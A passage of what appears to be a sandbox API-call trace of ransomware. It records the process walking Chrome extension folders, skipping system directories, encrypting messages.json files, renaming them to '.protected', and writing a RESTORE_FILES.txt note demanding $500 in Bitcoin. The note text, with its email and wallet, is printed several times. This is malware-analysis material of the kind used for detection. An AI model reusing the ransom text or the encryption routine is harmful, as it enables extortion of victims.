\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.618] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.619] lstrlenA (lpString="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") returned 684 [0078.619] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.619] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.619] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.619] CloseHandle (hObject=0x164) returned 1 [0078.620] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0078.620] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0078.620] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned 141 [0078.620] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0078.620] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0078.620] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*") returned 143 [0078.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.620] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.620] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.620] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.620] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.620] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.620] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\.") returned 143 [0078.620] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.620] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.620] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.620] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.620] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.620] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.620] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.621] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\..") returned 144 [0078.621] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.621] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.621] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.621] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.621] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") 
returned 155 [0078.621] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.621] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.621] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.621] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.622] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.622] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.622] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.622] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.623] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.623] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.623] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.623] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.624] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.624] CloseHandle (hObject=0x168) returned 1 [0078.624] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.protected") returned 165 [0078.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.protected")) returned 1 [0078.624] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.624] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.624] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0078.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.625] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.625] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.626] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.626] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.626] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.626] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.626] CloseHandle (hObject=0x164) returned 1 [0078.626] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.626] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0078.626] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0078.626] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0078.626] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0078.626] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0078.626] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned 141 [0078.626] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0078.626] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0078.626] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*") returned 143 [0078.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.627] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.627] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.627] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.627] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.627] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.627] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\.") returned 143 [0078.627] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.627] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.627] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.627] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.627] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.627] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.627] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.627] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\..") returned 144 [0078.627] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.627] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.627] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.627] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.627] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.627] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.627] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.627] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.627] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.627] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.628] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.628] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.628] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.628] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.629] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.629] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.629] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.629] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.629] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.629] CloseHandle (hObject=0x168) returned 1 [0078.629] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.protected") returned 165 [0078.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.protected")) returned 1 [0078.630] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.630] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.630] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0078.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.631] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.631] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.631] lstrlenA (lpString="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") returned 684 [0078.631] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
